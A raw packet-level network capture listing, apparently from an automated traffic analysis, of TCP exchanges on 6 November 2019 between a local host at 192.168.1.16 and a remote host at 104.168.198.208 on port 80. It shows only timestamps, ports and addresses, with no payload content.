Nov 6, 2019 14:02:49.689318895 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.689546108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689578056 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689647913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.689779997 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689807892 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689876080 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.689970970 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.689996958 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690068007 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.690118074 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.690319061 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690372944 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690398932 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690458059 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.690481901 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690675020 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.690690994 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690751076 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690799952 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.690853119 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.690953016 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.691180944 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.691222906 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.691293955 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.691518068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.691564083 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.691654921 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.691970110 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692076921 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692109108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692146063 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.692225933 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692316055 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.692410946 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692440033 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692501068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692600012 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.692709923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692780018 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.692836046 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.692925930 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693002939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693093061 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693150997 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693217039 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693260908 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693284988 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693382025 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693456888 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693499088 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693557024 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693598032 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693707943 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.693905115 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693948030 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.693985939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694024086 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.694025040 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694149017 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.694195986 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694267988 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694329977 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694340944 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.694480896 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.694696903 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694725037 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.694802046 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695031881 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695158958 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695234060 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695259094 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695278883 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695380926 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695408106 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695429087 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695534945 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695564985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695660114 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695732117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695832968 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.695880890 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.695981026 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.696053028 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.696182013 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.696198940 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.696315050 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.696496964 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.696600914 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.699774981 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.699794054 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.699893951 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.699966908 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.700072050 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.700145006 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.700267076 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.700274944 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.700334072 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.700408936 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.700618982 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.700750113 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.703393936 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703424931 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703439951 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703460932 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703512907 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703562021 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703564882 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.703610897 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703654051 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703695059 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703737974 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703764915 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703788042 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.703805923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703831911 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703869104 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703911066 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703938961 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.703962088 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.703983068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704016924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704044104 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704070091 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704118967 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704134941 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.704152107 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704196930 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704224110 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704322100 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.704404116 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704444885 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704520941 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.704642057 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704698086 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.704758883 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.705044985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705108881 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705168962 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.705267906 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705292940 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705415010 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.705419064 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705540895 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705589056 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705590963 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.705741882 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.705837011 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705955029 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.705975056 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.706119061 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.706186056 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706231117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706338882 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.706387997 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706464052 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706530094 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.706625938 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706646919 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706744909 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.706815004 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706845045 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.706964970 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.707051992 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707088947 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707179070 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.707268953 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707292080 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707387924 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.707618952 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707712889 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707758904 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.707839966 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707875013 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.707957029 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.708223104 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.708250999 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.708353996 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.708416939 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.708447933 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.708553076 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.736658096 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.739784956 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.871189117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.871213913 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.871332884 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.871392012 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.871489048 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.871903896 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.871937990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.871984959 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.872144938 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.872157097 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.872189999 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.872286081 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.872461081 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.872515917 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.872647047 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.872735977 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.872858047 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.872924089 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873032093 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.873138905 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873162985 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873238087 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.873636007 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873714924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873755932 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.873809099 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873826027 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.873872042 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.873961926 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874041080 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874078035 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874149084 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874331951 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874377966 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874433994 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874480009 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874555111 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874564886 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874667883 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874672890 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.874762058 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874914885 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.874922991 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875005007 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875086069 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875153065 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875178099 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875190973 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875257015 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875336885 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875494957 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875581026 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875587940 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875710011 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.875715971 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875802040 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.875984907 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876033068 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876049042 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876060009 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876188993 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876259089 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876351118 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876395941 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876491070 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876518011 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876571894 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876615047 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876708031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876786947 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.876944065 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.876976967 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877068996 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.877254009 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877276897 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877372026 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.877572060 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877625942 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877732992 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.877779007 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877800941 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.877902031 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.878102064 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878140926 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878201008 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.878415108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878508091 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.878607988 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878740072 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.878767967 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878792048 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878856897 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.878945112 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.878971100 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879025936 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.879138947 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879246950 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.879365921 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879426956 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879452944 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.879558086 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.879717112 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879749060 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.879812956 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.879940033 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880027056 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880055904 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880136013 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880208969 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880302906 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880392075 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880489111 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880572081 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880604982 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880667925 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880719900 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880769968 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880856991 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.880882025 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.880951881 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881057024 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881103039 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881130934 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881206989 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881380081 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881402969 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881474018 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881519079 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881652117 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881681919 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881791115 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.881833076 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.881947994 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882019043 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882155895 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882169962 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882225990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882293940 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882343054 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882359028 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882447004 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882498026 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882616997 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882663012 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.882819891 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.882875919 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883019924 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.883171082 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883219004 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883301020 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.883305073 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883449078 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.883488894 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883584023 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.883716106 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883764029 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883815050 CET	49163	80	192.168.1.16	104.168.198.208
